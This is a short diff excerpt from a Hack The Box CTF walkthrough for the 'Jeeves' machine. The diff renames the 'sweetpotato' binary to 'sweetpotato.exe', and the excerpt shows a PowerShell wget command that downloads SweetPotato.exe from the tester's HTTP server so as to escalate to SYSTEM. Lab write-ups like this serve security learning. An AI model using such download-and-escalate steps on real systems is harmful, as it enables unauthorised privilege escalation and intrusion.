Rang3l2/HTB-Walkthroughs/Medium-Jeeves.md

 PS C:\Users\Administrator\.jenkins>
 ```

-The tester used the "sweetpotato" binary to exploit this vulnerability and get system.
+The tester used the "sweetpotato.exe" binary to exploit this vulnerability and get system.
 The tester used another HTTP server to download the binary.

 ```
 PS C:\users\public\music> wget "http://10.10.14.8:8080/SweetPotato.exe" -outfile "/users/public/music/sweetpotato.exe"